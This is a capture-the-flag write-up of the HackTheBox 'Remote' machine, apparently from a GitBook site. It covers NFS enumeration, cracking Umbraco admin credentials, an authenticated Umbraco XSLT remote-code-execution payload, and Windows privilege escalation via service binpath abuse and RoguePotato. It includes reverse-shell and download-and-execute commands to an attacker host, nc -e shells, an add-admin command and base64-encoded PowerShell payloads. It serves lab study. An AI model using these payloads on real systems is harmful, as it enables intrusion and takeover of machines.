📓
HackTheBox - Windows
  • HackTheBox - Forest
  • HackTheBox - Bastion
  • HackTheBox - Access
  • HackTheBox - Optimum
  • HackTheBox - Bounty
  • HackTheBox - Granny
  • HackTheBox - Arctic
  • HackTheBox - Sniper
  • HackTheBox - Querier
  • HackTheBox - Heist
  • HackTheBox - Remote
  • HackTheBox - Sauna
  • HackTheBox - ServMon
  • HackTheBox - Linux
Powered by GitBook
On this page
  • Nmap scan results
  • Enumerating webserver (Microsoft HTTPAPI)
  • Mounting the NFS Share
  • Exploiting Umbraco's RCE (Authenticated)
  • Using nishang's powershell script to get a reverse shell
  • Running winpeas.exe (Privilege Escalation)
  • Trying Rogue Potato Attack

Was this helpful?

HackTheBox - Remote

PreviousHackTheBox - HeistNextHackTheBox - Sauna

Last updated 4 years ago

Was this helpful?

Nmap scan results

nmap -p- -A -T4 -oA nmap-remote 10.10.10.180

Let's enumerate the FTP Server and see if we can get any sensitive/conf files.

Enumerating webserver (Microsoft HTTPAPI)

Umbraco is an open-source content management system platform for publishing content on the World Wide Web and intranets. It is written in C# and deployed on Microsoft based infrastructure.

gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.180/ -o gob-dir-scan.out -t 50

There are certain exploits available for this CMS but we need to enumerate the version used.

NFS, or Network File System, is a collaboration system developed by Sun Microsystems in the early 80s that allows users to view, store, update or share files on a remote computer as though it was a local computer.

mount -t nfs 10.10.10.180:/site_backups /mnt/backups -o nolock

So the configuration file for Umbraco CMS is stored in Umbraco.sdf file which contains the usernames and passwords. The file is located at App_data/Umbraco.sdf

I actually ran strings on Umbraco.sdf file to get the credentials for admin. We will also need to verify the version used. Check Web.config file

Get the SHA-1 hash for admin and crack it using John or hashcat.

Now that we have credentials, we can try to exploit that (Authenticated) Remote Code Execution

Exploiting Umbraco's RCE (Authenticated)

This is the vulnerable page at http://10.10.10.180/umbraco/developer/Xslt/xsltVisualize.aspx

<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">
<msxsl:script language="C#" implements-prefix="csharp_user">
    public string xml() 
    { 
        string cmd = "<cmd-arguments>"; System.Diagnostics.Process proc = new System.Diagnostics.Process(); proc.StartInfo.FileName = "<cmd>"; 
        proc.StartInfo.Arguments = cmd; 
        proc.StartInfo.UseShellExecute = false; 
        proc.StartInfo.RedirectStandardOutput = true;  
        proc.Start(); string output = proc.StandardOutput.ReadToEnd(); 
        return output;
     }  
 </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/> 
 </xsl:template> </xsl:stylesheet>
python3 exploit.py -u admin@htb.local -p baconandcheese -i http://10.10.10.180/ -c powershell -a "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5:8000/shell.ps1')"

Running winpeas.exe (Privilege Escalation)

certutil.exe -urlcache -f http://10.10.14.5:8000/winpeas.exe winpeas.exe

If the group "Authenticated users" has SERVICE_ALL_ACCESS in a service, then it can modify the binary that is being executed by the service. To modify it and execute nc you can do:

sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config <Service_Name> binpath= "net localgroup administrators username /add"
sc config <Service_Name> binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"

sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe"
echo "Iex(New-Object Net.WebClient).downloadString('http://10.10.14.5:8000/shell.ps1')" | iconv -t utf-16le | base64 -w 0
sc.exe config UsoSvc binpath= "cmd.exe /c powershell.exe -EncodedCommand SQBlAHgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AY
QBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADUAOgA4ADAAMAAwAC8AcwBoAGUAbABsAC4AcABzADEAJwApAAoA"
sc.exe start usosvc

Trying Rogue Potato Attack 

certutil.exe -urlcache -f http://10.10.14.5:8000/RogueOxidResolver.exe RogueOxidResolver.exe
certutil.exe -urlcache -f http://10.10.14.5:8000/RoguePotato.exe RoguePotato.exe

A CLSID is a globally unique identifier that identifies a COM class object. If your server or container allows linking to its embedded objects, you need to register a CLSID for each supported class of objects.

.\RoguePotato.exe -r 10.10.14.5 -e "powershell.exe -Enc SQBlAHgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADUAOgA4ADAAMAAwAC8AcwBoAGUAbABsAC4AcABzADEAJwApAAoA" -l 9999 -c "{B91D5831-B1BD-4608-8198-D72E155020F7}"

There's a CMS (Content Management System) running and we can search for potential exploits, but first we will run a gobuster scan in the background.

Mounting the Share

Using powershell script to get a reverse shell

Download the exploit from and transfer it to the target machine using certutil.exe

The exploit doesn't work without providing CLSID, we can get CLSID for UsoSvc service from .

Umbraco
NFS
nishang's
here
here
Windows Local Privilege EscalationHackTricks
Potatoes - Windows Privilege Escalation · Jorge Lajara
Epic Fail
Logo
Logo